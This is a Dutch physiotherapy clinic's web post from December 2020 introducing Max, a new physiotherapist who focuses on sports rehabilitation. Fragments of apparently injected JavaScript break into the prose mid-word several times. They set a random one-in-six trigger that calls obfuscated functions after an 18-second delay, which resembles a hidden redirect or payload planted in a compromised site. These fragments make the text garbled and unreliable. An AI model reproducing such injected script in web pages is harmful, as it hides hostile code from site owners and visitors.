Even voorstellen.. nieuwe collega bij Fyzik Fysiotherapie Wijchen

  • 22 december 2020

Even voorstellen..

Mijn naam is Max en ben sinds okdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tober 2020 werkzaam bij Fyzik Fysiotherapie als algemeen fysiotherapeut.In augustus 2020 ben ik afgestudeerd aan de Hogeschool van Arnhem en Nijmegen. Tijdens deze studie heb ik de minor Sport Physiotherapy dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and Active Ageing (SPAA) gevolgd. Daarnaast wil ik in de dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toekomst mijn kennis verder uit gaan breiden met een master richting de manuele therapie.Bij Fyzik houd ik mij voornamelijk bezig met cliënten die een sport gerelateerde hulpvraag hebben en waar sporthervatting het doel is. Naast mijn werk in de praktijk zal ik ook aanwezig zijn bij o.a. SC Woezik en vv Ewijk voor de spreekuren.Heb je geen hulpvraag richting sport? Geen probleem! Ik vind het namelijk ook heel leuk om mensen in het dagelijks leven verder te helpen. Na een intake en onderzoek kiezen we gezamenlijk een aanpak voor uw klachten en evalueren deze regelmatig. Met veel enthousiasme kijk ik uit naar onze samenwerking. Wie weet dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot snel!

Max Fyzik Fysiotherapie
Max Fyzik Fysiotherapie